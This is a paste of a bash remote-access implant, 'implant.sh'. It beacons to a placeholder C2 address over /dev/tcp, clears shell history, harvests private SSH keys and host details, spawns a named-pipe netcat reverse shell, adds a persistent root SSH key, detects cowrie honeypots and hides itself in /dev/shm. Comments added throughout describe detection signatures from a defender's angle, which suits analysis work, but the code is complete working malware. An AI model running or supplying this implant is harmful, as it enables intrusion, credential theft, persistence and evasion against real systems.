implant.sh
Jul 10th, 2023
  1. #!/bin/bash
  2. red='\e[31m'
  3. lred='\e[91m'
  4. green='\e[32m'
  5. lgreen='\e[92m'
  6. yellow='\e[33m'
  7. lyellow='\e[93m'
  8. blue='\e[34m'
  9. lblue='\e[94m'
  10. magenta='\e[35m'
  11. lmagenta='\e[95m'
  12. cyan='\e[36m'
  13. lcyan='\e[96m'
  14. grey='\e[90m'
  15. lgrey='\e[37m'
  16. white='\e[97m'
  17. black='\e[30m'
  18. ##)
  19. #( bg
  20. b_red='\e[41m'
  21. b_lred='\e[101m'
  22. b_green='\e[42m'
  23. b_lgreen='\e[102m'
  24. b_yellow='\e[43m'
  25. b_lyellow='\e[103m'
  26. b_blue='\e[44m'
  27. b_lblue='\e[104m'
  28. b_magenta='\e[45m'
  29. b_lmagenta='\e[105m'
  30. b_cyan='\e[46m'
  31. b_lcyan='\e[106m'
  32. b_grey='\e[100m'
  33. b_lgrey='\e[47m'
  34. b_white='\e[107m'
  35. b_black='\e[40m'
  36. ##)
  37. #( special
  38. reset='\e[0;0m'
  39. bold='\e[01m'
  40. italic='\e[03m'
  41. underline='\e[04m'
  42. inverse='\e[07m'
  43. conceil='\e[08m'
  44. crossedout='\e[09m'
  45. bold_off='\e[22m'
  46. italic_off='\e[23m'
  47. underline_off='\e[24m'
  48. inverse_off='\e[27m'
  49. conceil_off='\e[28m'
  50. crossedout_off='\e[29m'
  51. unset HISTFILE
  52.  
# Writes the operator-facing prompt ("Ready:" / "Enter help to see menu:")
# to file descriptor 3, which the main loop has connected to the C2
# socket. Callers additionally redirect `ready >&3`, so the text goes to
# the socket either way. The fixed prompt string is a usable network
# signature for this implant's traffic.
ready () {
  eval 'printf "${lgreen}Ready:\r\nEnter help to see menu:${reset} \r\n" >&3;'
}
  56.  
  57.  
# Outer loop: establish (or re-establish) the C2 connection. Every failure
# path in this loop is a bare `continue` with no delay, so while the C2 is
# unreachable the host retries the outbound connection to port 9001 in a
# tight loop — a noisy network indicator (repeated SYNs to one host:port).
while [ true ]; do

    # Hard-coded C2 address; a placeholder in this paste. Port is fixed
    # at 9001 in the exec line below.
    arr[0]="C2_IP_ADDRESS_HERE"
        svr=${arr[0]}

        # The TCP connection is made by bash itself via /dev/tcp — there
        # is no nc/curl/python child to look for. Hunt for a bash process
        # holding an ESTABLISHED outbound socket to port 9001.
        eval 'exec 3<>/dev/tcp/$svr/9001;'
        if [[ ! "$?" -eq 0 ]] ; then
            continue
        fi

    # First bytes on the wire after connect: the local date, then an
    # "Agent Name" line whose value is the md5 of /etc/passwd (used as a
    # per-host identifier), then the prompt from ready(). Together these
    # form a stable banner for a network signature.
    eval 'printf "${red}$(date)${reset}\r\n" >&3;'

    if [[ ! "$?" -eq 0 ]] ; then
            continue
        fi
        eval 'printf "${bold}Agent Name:${bold_off} $(md5sum /etc/passwd | cut -d '/' -f1)\r\n" >&3;'
    eval 'ready >&3;'
        if [[ ! "$?" -eq 0 ]] ; then
            continue
        fi

        # Inner loop: one command per line read from the socket. A failed
        # read (socket closed) breaks out and the outer loop reconnects.
        # Each test is `=~ "word"`, an unanchored substring match, so the
        # order of the branches below decides which handler runs when a
        # message contains more than one keyword.
        while [ true ]; do
            eval "read msg_in <&3;"

                if [[ ! "$?" -eq 0 ]] ; then
                    break
                fi

                # ping: liveness check; echoes back the text after the
                # first five characters of the message.
                if  [[ "$msg_in" =~ "ping" ]] ; then
                    eval 'printf "${green}succ %s${reset}\r\n" "${msg_in:5}" >&3;'
                        if [[ ! "$?" -eq 0 ]] ; then
                            break
                        fi
                        sleep 1
                        eval 'printf "${green}joined${reset}\r\n\r\n" >&3;'
            eval 'ready >&3;'

                        if [[ ! "$?" -eq 0 ]] ; then
                                break
                        fi
            # help: sends the command menu. The menu text itself is a
            # second fixed string that can be matched on the wire.
            elif [[ "$msg_in" =~ "help" ]] ; then
            eval 'printf "${bold}Help Menu:${bold_off}\r\n${bold}ping${bold_off} [*] check connection\r\n${bold}date${bold_off} [*] print UTC date time + local device time\r\n${bold}survey${bold_off} [*] conduct host survey\r\n${bold}cronj${bold_off} [*] investigate cron jobs\r\n${bold}rsyslog${bold_off} [*] check for remote logging\r\n${bold}cgroup${bold_off} [*] see cgroups\r\n${bold}sshkey${bold_off} [*] store ssh pub key in /root/.ssh/\r\n${bold}ld${bold_off} [*] dir listing\r\n${bold}honeypot${bold_off} [*] check for cowrie honeypot\r\n${bold}help${bold_off} [*] display commands\r\n${bold}ps${bold_off} [*] process list tree\r\n${bold}netstat${bold_off} [*] view connections\r\n${bold}users${bold_off} [*] see logged on users\r\n${bold}shell${bold_off} [*] spawn remote shell\r\n${bold}traceroute${bold_off} [*] see path to remote machine\r\n${bold}exit${bold_off} [*] quit session\r\n\r\n" >&3;'
            eval 'ready >&3;'

        # traceroute: runs traceroute to 8.8.8.8 with output redirected to
        # /tmp/trace, sends the file contents back, then deletes it. The
        # file is a short-lived /tmp artifact; the traceroute process and
        # its ICMP/UDP probes are the observable part.
        elif [[ "$msg_in" =~ "traceroute" ]] ; then
            eval 'printf "traceroute 8.8.8.8: $(traceroute 8.8.8.8 > /tmp/trace)\r\n" >&3;'
            sleep 3
            eval 'printf "getting data: $(cat /tmp/trace)\r\n" >&3;'
            rm /tmp/trace
            eval 'ready >&3;'

        # shell: the well-known named-pipe reverse shell pattern. Artifacts:
        # a FIFO at /tmp/f, and `sh -i` plus `nc` child processes of this
        # bash. Note the nc target here is 127.0.0.1:9002 (loopback), not
        # the C2 address in $svr.
        elif [[ "$msg_in" =~ "shell" ]]; then
            eval 'printf "Start a listener on 9002:\r\n" >&3;'
            sleep 10
            eval '$(rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 127.0.0.1 9002 >/tmp/f)'
            eval 'ready >&3;'

        # date: local and UTC time of the host.
        elif [[ "$msg_in" =~ "date" ]]; then
            eval 'printf "${bold}Date/Time (local + utc):${bold_off}\r\n$(date; date -u)\r\n" >&3;'

        # cronj: enumerates cron configuration — writable cron paths,
        # non-comment lines of /etc/crontab, /etc/cron.d and
        # /etc/anacrontab, and whether user crontabs are readable.
        # Read-only reconnaissance; no cron entries are written here.
        elif [[ "$msg_in" =~ "cronj" ]]; then
            eval 'printf "${bold}${green}cron tasks writable by user:${reset}\r\n$(find -L /etc/cron* /etc/anacron /var/spool/cron -writable 2>/dev/null)\r\n" >&3;'
            eval 'printf "${bold}${green}cron jobs:${reset}\r\n$(grep -ERv "^(#|$)" /etc/crontab /etc/cron.d/ /etc/anacrontab 2>/dev/null)\r\n" >&3;'
            eval 'printf "${bold}${green}can we read user crontabs:${reset}\r\n$(ls -la /var/spool/cron/crontabs/* 2>/dev/null || echo "permission denied")\r\n\n" >&3;'

        # rsyslog: reads the non-comment lines of /etc/rsyslog.conf, i.e.
        # checks whether host logs are forwarded to a remote collector.
        elif [[ "$msg_in" =~ "rsyslog" ]]; then
            eval 'printf "${bold}${green}checking rsyslog:${reset}\r\n$(cat /etc/rsyslog.conf | grep -v "^#" || echo "permission denied")\r\n" >&3;'

        # ld: current working directory and a long listing of it.
        elif [[ "$msg_in" =~ "ld" ]]; then
           eval 'printf "Dir: $(pwd)\r\n" >&3;'
           eval 'printf "Listing: $(ls -lartF)\r\n" >&3;'
           eval 'ready >&3;'


        # users: output of w(1) — who is logged on and what they run.
        elif [[ "$msg_in" =~ "users" ]]; then
            eval 'printf "Logged on users: $(w)\r\n" >&3;'
            eval 'ready >&3;'

        # honeypot: fingerprints a default cowrie honeypot. If any of the
        # checks below trips, the implant prints a message and exits with
        # a distinct status (4-7). The indicators tested are: hostname
        # "srv04"; a "phil" entry in /home together with "Debian 4." in
        # /proc/version; absence of the file(1) binary; and "64 bytes"
        # replies to a ping of the impossible address 999.999.999.999.
        # Honeypot operators can use this list to see what the implant
        # expects a real host to look like.
        elif [[ "$msg_in" =~ "honeypot" ]]; then
            eval 'printf "${green}Starting honeypot checks:${reset}\r\n" >&3;'
            view=$(which cat)

            if [ "$($view /etc/hostname | grep srv04)" ]; then
                eval 'printf "${red}Honeypot detected!!!${reset}\r\n" >&3;'
                    exit 4
            else
                    eval 'printf "Hostname is NOT srv04\r\n" >&3;'
            fi
            look=$(which ls)
            if [ "$($look /home | grep 'phil' && $view /proc/version | grep "Debian 4.")" ]; then
                eval 'printf "${red}Honeypot detected!!!${reset}\r\n" >&3;'
                    exit 5
            else
                    eval 'printf "No phil user detected\r\n" >&3;'
            fi
            if [ "$(which file)" ]; then
                    eval 'printf "file command on the box\r\n" >&3;'
            else
                eval 'printf "${red}Honeypot detected!!!${reset}\r\n" >&3;'
                    exit 6
            fi
            fake=$(ping -c 4 999.999.999.999 | grep "64 bytes" | cut -d " " -f1,2)
            if [ "$fake" ];then
                eval 'printf "${red}Honeypot detected!!!${reset}\r\n" >&3;'
                    exit 7
            else
                    eval 'printf "Fake internet not detected\r\n" >&3;'
                eval 'printf "${green}Honey pot checks over, no cowrie hp detected${reset}\n\r" >&3;'
                eval 'ready >&3;'
            fi
        # ps: full process list.
        elif [[ "$msg_in" =~ "ps" ]]; then
            eval 'printf "Process list: $(ps -ef 2>/dev/null)\r\n" >&3;'
            eval 'ready >&3;'

        # netstat: socket table via netstat, falling back to ss.
        elif [[ "$msg_in" =~ "netstat" ]]; then
            eval 'printf "Connections: $(netstat -antpu 2>/dev/null || ss -tulwn 2>/dev/null)\r\n" >&3;'
            eval 'ready >&3;'

        # cgroup: systemd cgroup tree (often used to tell containers from
        # bare hosts).
        elif [[ "$msg_in" =~ "cgroup" ]]; then
            eval 'printf "cgroup: $(systemd-cgls --no-pager 2>/dev/null)\r\n" >&3;'
            eval 'ready >&3;'

        # sshkey: persistence. $perms is the numeric uid parsed out of
        # id(1); when it is 0 a hard-coded public key (placeholder in this
        # paste) is appended to /root/.ssh/authorized_keys and the whole
        # file is sent back. Detection: file-integrity or audit rules on
        # /root/.ssh/authorized_keys, and an unexpected key in that file.
        elif [[ "$msg_in" =~ "sshkey" ]]; then
            perms=$(id | grep uid | cut -d ' ' -f1 | cut -d '=' -f2 | cut -d '(' -f1)
            if [ $perms -eq 0 ]; then
                mkdir -p /root/.ssh 2>/dev/null
                echo "SSH_KEY_HERE"  >> /root/.ssh/authorized_keys
                eval 'printf "Sending authorized_keys file back: $(cat /root/.ssh/authorized_keys)\r\n" >&3;'
                eval 'ready >&3;'
            else
                eval 'printf "You are not root!! SSH Key not added\r\n" >&3;'
                eval 'ready >&3;'
            fi
        # survey: one-shot host reconnaissance. Network indicator: an
        # outbound HTTP request to ipinfo.io. Host side: interface listing
        # (ip a piped into ifconfig), id, a filesystem-wide search for
        # SUID binaries, kernel string, the user's crontab, the contents
        # of every file named id_rsa under / (private-key harvesting),
        # then sockets and processes. Expect a burst of find(1) activity
        # over the whole filesystem when this runs.
        elif [[ "$msg_in" =~ "survey" ]]; then
            eval 'printf "${bold}${green}public ip information:${reset}\n$(curl ipinfo.io 2>/dev/null; sleep 1)\r\n\n" >&3;'
            eval 'printf "${bold}${green}ip information:\n${reset}$(ip a | ifconfig)\r\n\n" >&3;'
            eval 'printf "${bold}${green}perms:\n${reset}$(id)\r\n\n" >&3;'
            eval 'printf "${bold}${green}suid binaries:\n${reset}$(find / -perm -u=s -type f 2>/dev/null)\r\n\n" >&3;'

            eval 'printf "${bold}${green}os, kernel:\n${reset}$(uname -a)\r\n\n" >&3;'
            eval 'printf "${bold}${green}crontab:\r\n${reset}$(crontab -l | grep -Ev "^#")\r\n\n" >&3;'
            eval 'printf "${bold}${green}ssh keys:\n${reset}$(find / -type f -name "id_rsa" 2>/dev/null -exec cat {} \;)\r\n\n" >&3;'
            eval 'printf "${bold}${green}connections:\n${reset}$(netstat -antpu 2>/dev/null || ss -tulwn 2>/dev/null)\r\n" >&3;'
            eval 'printf "${bold}${green}process list:\n${reset}$(ps -ef 2>/dev/null)\r\n" >&3;'
            eval 'ready >&3;'

        # exit: terminates the implant process (no reconnect).
        elif [[ "$msg_in" =~ "exit" ]]; then
            eval 'printf "${bold}${red}implant exiting, goodbye${reset}\r\n" >&3;'
            exit 0
        # hide: moves the script (relative path implant.sh, i.e. from the
        # current working directory) into /dev/shm, a memory-backed tmpfs,
        # re-runs it from there, and removes that copy. Script execution
        # out of /dev/shm is a common detection rule; the file will be
        # gone by the time the nested instance returns, so capture it
        # live or from process memory if needed.
        elif [[ "$msg_in" =~ "hide" ]]; then
            eval 'printf "${bold}implant hiding, will call back shortly on the same port${reset}\r\n" >&3;'
            mv implant.sh /dev/shm
            sleep 5
            source /dev/shm/implant.sh || bash /dev/shm/implant.sh
            sleep 5
            rm /dev/shm/implant.sh

            exit 0

        # Anything else: error reply; the inner loop keeps reading.
        else
            eval 'printf "${red}That is not a valid command:${reset}\r\n" >&3;'
                fi
        done
done